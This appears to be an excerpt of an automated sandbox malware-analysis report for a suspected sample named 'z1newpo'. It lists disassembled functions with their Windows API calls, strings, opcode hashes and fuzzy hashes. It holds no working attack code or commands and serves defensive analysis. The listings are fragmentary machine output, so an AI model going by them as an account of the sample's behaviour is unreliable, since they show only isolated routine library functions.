                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 3375834691-2298589950
                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                    Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: $<
                                                    • API String ID: 4104443479-428540627
                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                    Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                    Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                    Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                    Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                    Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                    Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                    Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                    • String ID: crts
                                                    • API String ID: 943502515-3724388283
                                                    • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                    • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                    Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$LabelVolume
                                                    • String ID: \VH
                                                    • API String ID: 2006950084-234962358
                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                    Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                    • DrawMenuBar.USER32 ref: 00449761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                    • String ID: 0
                                                    • API String ID: 772068139-4108050209
                                                    • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                    • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                    Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcscpy
                                                    • String ID: 3, 3, 8, 1
                                                    • API String ID: 3469035223-357260408
                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                    Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                    • API String ID: 2574300362-3530519716
                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                    Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                    • API String ID: 2574300362-275556492
                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                    Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                    • API String ID: 2574300362-58917771
                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
